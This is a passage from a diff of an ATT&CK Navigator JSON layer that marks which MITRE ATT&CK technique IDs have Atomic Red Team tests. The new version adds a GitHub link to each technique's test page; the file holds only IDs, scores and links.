test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"},{"techniqueID":"T1003.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"},{"techniqueID":"T1003.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"},{"techniqueID":"T1006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"},{"techniqueID":"T1007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"},{"techniqueID":"T1010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"},{"techniqueID":"T1012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"},{"techniqueID":"T1014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"},{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1020","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"},{"techniqueID":"T1021.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"},{"techniqueID":"T1021.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"},{"techniqueID":"T1021.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"},{"techniqueID":"T1021.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1021","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"},{"techniqueID":"T1036.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"},{"techniqueID":"T1036.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"},{"techniqueID":"T1037.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1047","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"},{"techniqueID":"T1048.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"},{"techniqueID":"T1048","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"},{"techniqueID":"T1049","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"},{"techniqueID":"T1053.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"},{"techniqueID":"T1053.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"},{"techniqueID":"T1053.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"},{"techniqueID":"T1053.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.004/T1053.004.md"},{"techniqueID":"T1053.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"},{"techniqueID":"T1053.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"},{"techniqueID":"T1053.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1053","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"},{"techniqueID":"T1055.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"},{"techniqueID":"T1055.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"